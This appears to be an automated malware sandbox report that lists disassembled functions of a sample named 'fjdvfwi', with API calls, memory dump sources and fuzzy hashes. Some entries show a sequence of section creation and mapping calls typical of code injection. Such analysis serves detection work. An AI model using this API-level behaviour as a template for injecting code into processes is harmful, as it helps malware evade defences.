                                                                                                                                                                                                                                                                                                                  control_flow_graph 560 4029e2-402a0b call 40120e 567 402a0f-402a1d LdrLoadDll 560->567 568 402a26-402a71 call 40120e 567->568 569 402a1f 567->569 569->568
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __malloc_crt
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3464615804-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6534e10226297e339f4658bfcf21ca7635ed003ce0470ead6bcd670b1f8b2216
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39bf8517ed29ffd9322e22d1fa5be3ed8d731800a1d3e5f0e08985437c400f20
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6534e10226297e339f4658bfcf21ca7635ed003ce0470ead6bcd670b1f8b2216
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F0E9375001105ACB307734BC4A8A72228CAD536C316483BF401E37A0FA3A4D8B82AD
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(007BC8CC,007BC964,00000040,?,?,0042EBF4), ref: 0042E118
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000042E000.00000020.00000001.01000000.00000005.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_42e000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: eec3ad208163954146d9126300b6ea4b62a28f544574202ac31790fe23fec003
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 23346e8c6619fbbda6626ef8913dc5ea4368bbdd846615d2d8d5797c2c4b63a6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eec3ad208163954146d9126300b6ea4b62a28f544574202ac31790fe23fec003
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B01E8B110A3409EE701CFA5FE85B12BBA4E748705F10B12DF255962B1CF784640CBBD
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007FDB48
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2579756154.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F8000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7f8000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b05a159763a906022d5ea3d2f05a4a32f6418b1843dfdfd7311c926d14defbd6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63113C79A00208EFDB01DF98C989E98BBF5AF08351F058094FA489B362D375EE50DF80
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040BFCA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040BFE1
                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040BFEF
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040BFFF
                                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0040C013
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 772a8c221fbc5ba7f30b4d0931496a36d951b32cc004d0b36c4964055d9fc683
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b6464d8b5c8a2656e09f50e19f18634982ee79381d3ed1b89a33488fd702650
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 772a8c221fbc5ba7f30b4d0931496a36d951b32cc004d0b36c4964055d9fc683
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF0C232900312DBD624BB668C02B5A32A0EF00719F10063FF405FB6D2CB7C5A40EE9E
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040B849
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040B869
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040B879
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                  • String ID: h3C
                                                                                                                                                                                                                                                                                                                  • API String ID: 3445076945-2721789584
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fb7e8230df80c89109e43ec8bf2f062cb18c349c47bab0e287928457a382fcf
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 70d3d12c1b6c068ff77d7befbd2ccd44c8f71ac2e3557a1cf9fbce01ca94aa3c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fb7e8230df80c89109e43ec8bf2f062cb18c349c47bab0e287928457a382fcf
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4018E329006119BD711BF669445B5A7364FF04719F00813BE804B76E0CB3C9981CBDD
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040C0FF
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041208A: __mtinitlocknum.LIBCMT ref: 004120A0
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041208A: __amsg_exit.LIBCMT ref: 004120AC
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040C120
                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0040C13E
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __lock$___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                  • String ID: h3C
                                                                                                                                                                                                                                                                                                                  • API String ID: 2123130959-2721789584
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 106cbe1b396be76e6be7e0fd6ac139be0086d3df0ca435349922fd558e8e738c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 57a25fc3f36aa6f0d6a16c05ea14bac2c92729e0062948df83733c441e9e9563
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 106cbe1b396be76e6be7e0fd6ac139be0086d3df0ca435349922fd558e8e738c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB01A571440700DFD320AF66C945749BBE0AF04315F108A1FE5D6667E1CBB8A644CF18
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2478854527-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f8310ed9e7c38dd61ed72ace8746fab632eeba00b57f5d3d50a830db5c339aa3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ff714db56b393ef8047c28b7d72382b37e163d8e06f4682dbe3d961ea013a96
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8310ed9e7c38dd61ed72ace8746fab632eeba00b57f5d3d50a830db5c339aa3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD31A2B1904310EBD720AF75AD4A61A3FA5EB18760B14527BE550A22F0D7BD8C40DF5C
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410044
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410052
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410060
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041006B
